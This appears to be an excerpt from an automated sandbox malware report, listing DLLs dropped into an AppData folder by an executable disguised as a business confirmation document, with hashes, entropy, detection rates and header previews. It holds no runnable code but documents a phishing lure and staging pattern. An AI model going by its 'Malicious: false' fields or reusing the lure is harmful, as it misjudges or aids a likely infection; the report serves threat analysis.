Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
SSDEEP:	1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: h1gMAKBj8d.exe, Detection: malicious, Browse Filename: 1AQz4ua1TU.exe, Detection: malicious, Browse Filename: GolyROknn9.exe, Detection: malicious, Browse Filename: 4uL7Ej2F0Y.exe, Detection: malicious, Browse Filename: Ar25M0UwOR.exe, Detection: malicious, Browse Filename: yOrAsxt8Qv.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.20068.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.5648.exe, Detection: malicious, Browse Filename: tYSf9q5AiJ.exe, Detection: malicious, Browse Filename: gjeg84WXoG.exe, Detection: malicious, Browse Filename: 63TfhsKG1h.exe, Detection: malicious, Browse Filename: UIKqwBvL6s.exe, Detection: malicious, Browse Filename: mIkTGifBOr.exe, Detection: malicious, Browse Filename: JJvkhWtyEm.exe, Detection: malicious, Browse Filename: uLVu6RlD4i.exe, Detection: malicious, Browse Filename: lm2LHApR75.exe, Detection: malicious, Browse Filename: RsApxCz3YQ.exe, Detection: malicious, Browse Filename: l59qWeKoK3.exe, Detection: malicious, Browse Filename: u5h7R8M2X5.exe, Detection: malicious, Browse Filename: UBYK8k1SPz.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
SSDEEP:	384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
SSDEEP:	768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
